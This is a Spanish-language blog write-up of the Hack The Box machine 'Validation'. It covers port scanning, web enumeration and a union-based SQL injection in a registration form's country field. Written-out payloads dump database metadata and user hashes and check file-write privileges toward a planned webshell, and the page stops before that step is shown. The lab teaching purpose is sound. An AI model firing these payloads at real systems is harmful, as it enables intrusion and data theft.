<!DOCTYPE html><html lang="es-ES" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Validation Writeup" /><meta name="author" content="xdann1" /><meta property="og:locale" content="es_ES" /><meta name="description" content="Máquina Easy, en la que encontramos un SQLi, gracias a esto conseguimos escribir una webshell en el servidor consiguiendo un RCE, por último, encontramos unas credenciales en un archivo de configuración que sirven para el usuario root." /><meta property="og:description" content="Máquina Easy, en la que encontramos un SQLi, gracias a esto conseguimos escribir una webshell en el servidor consiguiendo un RCE, por último, encontramos unas credenciales en un archivo de configuración que sirven para el usuario root." /><link rel="canonical" href="https://xdann1.github.io/posts/writeup-validation/" /><meta property="og:url" content="https://xdann1.github.io/posts/writeup-validation/" /><meta property="og:site_name" content="xDaNN1" /><meta property="og:image" content="https://xdann1.github.io/assets/img/commons/validation/validation.png" /><meta property="og:image:height" content="500" /><meta property="og:image:width" content="800" /><meta property="og:image:alt" content="Banner Validation" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-06-01T00:00:00+02:00" /><meta name="twitter:card" content="summary_large_image" /><meta property="twitter:image" content="https://xdann1.github.io/assets/img/commons/validation/validation.png" /><meta name="twitter:image:alt" content="Banner Validation" /><meta property="twitter:title" content="Validation Writeup" /><meta name="twitter:site" content="@xdann1_" /><meta name="twitter:creator" content="@xDaNN1_" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"xdann1","url":"https://xdann1.github.io"},"dateModified":"2022-06-01T00:00:00+02:00","datePublished":"2022-06-01T00:00:00+02:00","description":"Máquina Easy, en la que encontramos un SQLi, gracias a esto conseguimos escribir una webshell en el servidor consiguiendo un RCE, por último, encontramos unas credenciales en un archivo de configuración que sirven para el usuario root.","headline":"Validation Writeup","image":{"width":800,"height":500,"alt":"Banner Validation","url":"https://xdann1.github.io/assets/img/commons/validation/validation.png","@type":"imageObject"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://xdann1.github.io/posts/writeup-validation/"},"url":"https://xdann1.github.io/posts/writeup-validation/"}</script><title>Validation Writeup | xDaNN1</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="xDaNN1"><meta name="application-name" content="xDaNN1"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get MODE_ATTR() { return "data-mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_ATTR, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_ATTR); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" class="mx-auto"> <img src="/assets/img/commons/avatar.png" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">xDaNN1</a></div><div class="site-subtitle font-italic">Cybersecurity enthusiast | CTF Player</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>INICIO</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORÍAS</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>ETIQUETAS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVO</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>SOBRE MÍ</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/xdann1" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/xdann1_" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href="https://app.hackthebox.com/profile/535069" aria-label="hackthebox" target="_blank" rel="noopener"> <i class="fas fa-cube"></i> </a> <a href="https://www.linkedin.com/in/danielqueroperez/" aria-label="linkedin" target="_blank" rel="noopener"> <i class="fab fa-linkedin"></i> </a> <a href="" aria-label="" target="_blank" rel="noopener"> <i class=""></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Inicio </a> </span> <span>Validation Writeup</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Entrada</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Buscar..."> </span> <span id="search-cancel" >Cancelar</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 800 500'%3E%3C/svg%3E" data-src="../../assets/img/commons/validation/validation.png" class="preview-img bg" alt="Banner Validation" width="800" height="500" data-proofer-ignore><h1 data-toc-skip>Validation Writeup</h1><div class="post-meta text-muted"><div> Por <em> <a href="https://xdann1.github.io">xdann1</a> </em></div><div class="d-flex"><div> <span> Publicado <em class="timeago" data-ts="1654034400" data-toggle="tooltip" data-placement="bottom" data-tooltip-df="llll" > 2022-06-01 </em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1949 palabras"> <em>10 min</em> de lectura</span></div></div></div><div class="post-content"><p>Máquina Easy, en la que encontramos un SQLi, gracias a esto conseguimos escribir una webshell en el servidor consiguiendo un RCE, por último, encontramos unas credenciales en un archivo de configuración que sirven para el usuario root.</p><h2 id="recopilación-de-información"><span class="mr-2">Recopilación de Información</span><a href="#recopilación-de-información" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2><p>Primero vamos a comprobar la conectividad con la máquina.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>❯ ping -c 1 10.129.97.4
PING 10.129.97.4 (10.129.97.4) 56(84) bytes of data.
64 bytes from 10.129.97.4: icmp_seq=1 ttl=63 time=31.0 ms

--- 10.129.97.4 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 31.015/31.015/31.015/0.000 ms
</pre></table></code></div></div><p>En la salida del comando anterior se puede ver un parámetro llamado <code class="language-plaintext highlighter-rouge">ttl</code>, gracias a este parámetro podemos saber que sistema operativo está corriendo en la máquina víctima.</p><ul><li>GNU/Linux = TTL 64<li>Windows = TTL 128</ul><p>En este caso, el sistema operativo que está corriendo en la máquina víctima es GNU/Linux.</p><p>Vamos a usar la herramienta <code class="language-plaintext highlighter-rouge">nmap</code> para descubrir que puertos están abiertos y que servicios estan asociados a estos.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>❯ nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.97.4 -oG allPorts
</pre></table></code></div></div><ul><li>-p- &gt; Escanea todos los puertos (65535)<li>–open &gt; Muestra solo los puertos con un estatus “open”<li>-sS &gt; Aplica un TCP SYN Scan<li>–min-rate 5000 &gt; Indica que quiero emitir paquetes no más lentos que 5000 paquetes por segundo<li>-vvv &gt; Muestra la información en pantalla a medida que se descubre<li>-n &gt; Indica que no aplique resolución DNS<li>-Pn &gt; Indica que no aplique el protocolo ARP<li>10.129.97.4 &gt; Dirección IP que se quiere escanear<li>-oG allPorts &gt; Exporta el output a un fichero grepeable con nombre “allPorts”</ul><p>Este sería el output del escaneo:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-01 01:30 CEST
Scanning 10.129.97.4 [65535 ports]
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
80/tcp   open  http       syn-ack ttl 62
4566/tcp open  kwtc       syn-ack ttl 63
8080/tcp open  http-proxy syn-ack ttl 63
</pre></table></code></div></div><p>Ahora vamos a realizar un escaneo más profundo, también con <code class="language-plaintext highlighter-rouge">nmap</code> pero esta vez solamente lanzaremos scripts básicos de enumeración y analizaremos la versión de los puertos abiertos obtenidos anteriormente.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>❯ nmap -p22,80,4566,8080 -sC -sV 10.129.97.4 -oN targeted
</pre></table></code></div></div><ul><li>-p22,80,4566,8080 &gt; Indica los puertos que se quieren escanear<li>-sC &gt; Lanza scripts básicos de enumeración<li>-sV &gt; Enumera la versión y servicio que está corriendo en los puertos<li>10.129.97.4 &gt; Dirección IP que se quiere escanear<li>-oN targeted &gt; Exporta el output a un fichero en formato nmap con nombre “targeted”</ul><p>Este sería el output del escaneo:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-01 01:33 CEST
Nmap scan report for 10.129.97.4
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
|   256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_  256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp   open  http    Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
4566/tcp open  http    nginx
|_http-title: 403 Forbidden
8080/tcp open  http    nginx
|_http-title: 502 Bad Gateway
</pre></table></code></div></div><p>Los puertos abiertos y sus servicios asocidados son:</p><ul><li>22/tcp &gt; ssh<li>80/tcp &gt; http<li>4566/tcp &gt; http<li>8080/tcp &gt; http</ul><p>Empezaremos enumerando las tecnologías que está utilizando la página. Esto lo podemos hacer utilizando un plugin del navegador llamadado <code class="language-plaintext highlighter-rouge">Wappalyzer</code> o utilizando la herramienta <code class="language-plaintext highlighter-rouge">whatweb</code>. Al ser varios servicios http vamos a usar un one-liner para evaluarlos de una vez.</p><div class="language-bash highlighter-rouge"><div class="code-header"> <span data-label-text="Shell"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>❯ <span class="k">for </span>port <span class="k">in</span> <span class="si">$(</span><span class="nb">cat </span>targeted | <span class="nb">grep </span>http | <span class="nb">grep</span> <span class="nt">-oP</span> <span class="s1">'\d{1,5}/tcp'</span> | <span class="nb">cut</span> <span class="nt">-d</span> <span class="s2">"/"</span> <span class="nt">-f</span> 1 <span class="si">)</span><span class="p">;</span> <span class="k">do </span><span class="nb">echo</span> <span class="s2">"</span><span class="se">\n</span><span class="s2">[*] Puerto </span><span class="nv">$port</span><span class="s2">:"</span><span class="p">;</span> whatweb http://10.129.97.4:<span class="nv">$port</span><span class="p">;</span> <span class="k">done</span>
</pre></table></code></div></div><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>
[*] Puerto 80:
http://10.129.97.4:80 [200 OK] Apache[2.4.48], Bootstrap, Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.48 (Debian)], IP[10.129.97.4], JQuery, PHP[7.4.23], Script, X-Powered-By[PHP/7.4.23]

[*] Puerto 4566:
http://10.129.97.4:4566 [403 Forbidden] Country[RESERVED][ZZ], HTTPServer[nginx], IP[10.129.97.4], Title[403 Forbidden], nginx

[*] Puerto 8080:
http://10.129.97.4:8080 [502 Bad Gateway] Country[RESERVED][ZZ], HTTPServer[nginx], IP[10.129.97.4], Title[502 Bad Gateway], nginx
</pre></table></code></div></div><p>El nginx del puerto 4566 nos da un código de estado 403 y el nginx del puerto 8080 nos da un código de estado 502, por lo que solamente vamos a poder interactuar con el sevicio web del puerto 80.</p><p>Ahora podríamos intentar hacer un reconocimiento de rutas con <code class="language-plaintext highlighter-rouge">dirsearch</code>, Utilizaremos fuerza bruta para enumerar rutas potenciales.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>❯ dirsearch -u http://10.129.97.4/ -x 403
</pre></table></code></div></div><ul><li>-u http://10.129.97.4/ &gt; Indica la url a la que se le van a hacer las peticiones<li>-x 403 &gt; Oculta las peticiones con un código de estado</ul><p>Las rutas que hemos hallado son los siguientes:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>Target: http://10.129.97.4/

[01:59:09] Starting: 
[01:59:10] 301 -  307B  - /js  -&gt;  http://10.129.97.4/js/
[01:59:20] 200 -   16B  - /account.php
[01:59:33] 200 -    0B  - /config.php
[01:59:35] 301 -  308B  - /css  -&gt;  http://10.129.97.4/css/
[01:59:41] 200 -   16KB - /index.php
[01:59:41] 200 -   16KB - /index.php/login/
</pre></table></code></div></div><p>No tenemos nada demasiado interesante de momento.</p><h1 id="busqueda-de-vulnerabilidades">Busqueda de vulnerabilidades</h1><p>Vamos a ver como es la web.</p><p><img data-src="/assets/img/commons/validation/web.png" alt="Página Web" class="center-image" data-proofer-ignore> <em>Página Web</em></p><p>Parece ser que podemos entrar usando un nombre y un país. Vamos a probar si el campo del nombre es vulnerable.</p><p><img data-src="/assets/img/commons/validation/xss_1.png" alt="XSS" class="center-image" data-proofer-ignore> <em>XSS</em></p><p><img data-src="/assets/img/commons/validation/xss_2.png" alt="XSS" class="center-image" data-proofer-ignore> <em>XSS</em></p><p>Vemos que es el vulnerable a un XSS, sin embargo, esto no nos es útil ya que no tenemos a quién robarle la cookie para luego iniciar sesión. Probemos una inyección SQL.</p><p><img data-src="/assets/img/commons/validation/sql_2.png" alt="Prueba SQLi" class="center-image" data-proofer-ignore> <em>Prueba SQLi</em></p><p><img data-src="/assets/img/commons/validation/sql_2.png" alt="Prueba SQLi" class="center-image" data-proofer-ignore> <em>Prueba SQLi</em></p><p>Vemos que no estamos provocando ningun error en la query SQL por lo que deducimos que no es vulnerable a una inyección SQL. Pero solamente la hemos probado en el campo del nombre, por lo que aún nos falta probarla en el campo del país, para ello utilizaremos <code class="language-plaintext highlighter-rouge">burpsuite</code></p><p>Vamos a capturar la petición de tipo POST que enviamos al entrar usando un usario y el país, posteriormente la vamos a enviar al repeater para poder jugar con ella.</p><p><img data-src="/assets/img/commons/validation/burpsuite_1.png" alt="Burpsuite" class="center-image" data-proofer-ignore> <em>Interceptando la petición</em></p><p>Ahora, con la petición ya en el repeater intentemos comprobar si podemos conseguir una inyección SQL en el campo del país colocando una comilla simple.</p><p><img data-src="/assets/img/commons/validation/burpsuite_2.png" alt="SQLi" class="center-image" data-proofer-ignore> <em>Comprobando inyección SQL</em></p><p>Como sospechabamos, tenemos una inyección SQL en el campo del país.</p><h1 id="explotación">Explotación</h1><p>Más o menos podemos llegar a intuir como es la query que se manda, tiene que tener un aspecto parecido al siguiente.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>SELECT username from uhc where country = ['input usuario']; 
</pre></table></code></div></div><p>Como hemos visto antes el campo del país es vulnerable a una inyección SQL, usaremos un tipo inyección SQL llamada <code class="language-plaintext highlighter-rouge">Union Based</code> la query maliciosa quedaría así:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre> SELECT username from uhc where country = 'Brazil' UNION SELECT 1-- -';
</pre></table></code></div></div><p>Las inyecciones SQL de tipo <code class="language-plaintext highlighter-rouge">Union Based</code> nos permiten crear una consulta dentro de la consulta principal, agregando los resultados de la nuestra a la principal. Para ello necesitaremos poner el mismo número de campos en la consulta UNION como tenga la tabla, si no hacemos esto la consulta nos generará un error.</p><p>Para conseguirlo utilizaremos la orden <code class="language-plaintext highlighter-rouge">order by</code> seguido del número de campos que queramos probar, lo que tendremos que hacer es ir variando el número hasta encontrar cual no nos da error y que el siguente si nos lo de.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>username=xdann1&amp;country=Brazil' ORDER BY 1-- -
</pre></table></code></div></div><p>Vemos que la tabla cuenta solo con un campo, sabiendo esto ya nos podemos poner manos a la obra. Lo primero que haremos será sacar el nombre de la base de datos, la versión y el usuario que está corriendola. Como solo tenemos un campo con el que operar tendremos que recurrir a concatenar con la orden concat. (0x20 significa el caracter espacio en hexadecimal)</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>username=xdann1&amp;country=Brazil' UNION SELECT CONCAT(user(),0x20,database(),0x20,@@version)-- -
</pre></table></code></div></div><ul><li>Usuario &gt; uhc@localhost<li>Base de datos &gt; registration<li>Versión &gt; 10.5.11-MariaDB-1</ul><p>Empezemos buscando que bases de datos existen.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>username=xdann1&amp;country=Brazil' UNION SELECT schema_name FROM information_schema.schemata-- -
</pre></table></code></div></div><ul><li>Bases de datos existentes &gt; information_schema, performance_schema, mysql y registration</ul><p>Ahora vamos a sacar las tablas existentes en la base de datos registration.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>username=xdann1&amp;country=Brazil' UNION SELECT table_name FROM information_schema.tables where table_schema="registration"-- -
</pre></table></code></div></div><ul><li>Tablas existentes en la base de datos registration &gt; registration</ul><p>Saquemos las columnas de la tabla registration.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>username=xdann1&amp;country=Brazil' UNION SELECT column_name FROM information_schema.columns WHERE table_schema="registration" AND table_name="registration"-- -
</pre></table></code></div></div><ul><li>Columnas de la tabla registration &gt; username, userhash, country y regtime</ul><p>Vamos a sacar toda la información contenida de las columnas username y userhash.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>username=xdann1&amp;country=Brazil' UNION SELECT CONCAT(username,0x3a,userhash) FROM registration.registration-- -
</pre></table></code></div></div><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>xdann1:c2b5b685495dbbf7ea7d9539d8150f7b
xdann1':aed18eeb555ae4135a0fab179b34a001
</pre></table></code></div></div><p>Hemos obtenido los nombres y los hashes de los usuarios, pero no de otros usuarios, sino de los nuestros. Cosas que pasan… Aun así podemos probar otras cosas, por ejemplo, podemos intentar ver si el usuario que está corriendo la base de datos tiene permisos de escritura, si fuera así podríamos subir una web shell que nos de acceso a la máquina víctima.</p><p>Para poder escribir archivos del lado del servidor necesitamos tres cosas:</p><ol><li>Usuario con privilegio <code class="language-plaintext highlighter-rouge">FILE</code> habilitado<li>Variable <code class="language-plaintext highlighter-rouge">secure_file_priv</code> no habilitada<li>Acceso de escritura en la ubicación en la que queramos escribir.</ol><p>Vamos a comprobar que privilegios tiene otorgado nuestro usuario.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>username=xdann1&amp;country=Brazil' UNION SELECT CONCAT(grantee,0x3a,privilege_type) FROM information_schema.user_privileges WHERE grantee="'uhc'@'localhost'" AND privilege_type="FILE"-- -
</pre></table></code></div></div><ul><li>‘uhc’@’localhost’:FILE</ul><p>Ya sabemos que contamos con los privilegios necesarios, ahora vamos a ver si la variable <code class="language-plaintext highlighter-rouge">secure_file_priv</code> está activada. Esta variable se utiliza para determinar desde donde podemos leer/escribir archivos. Un valor vacío en esta variable nos indica que podemos leer/escribir en todo el sistema de archivos. MariaDB trae esta variable con un valor vacío por defecto, igualmente vamos a revisar su valor.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>username=xdann1&amp;country=Brazil' UNION SELECT CONCAT(variable_name,0x3a,variable_value) FROM information_schema.global_variables WHERE variable_name="secure_file_priv"-- -
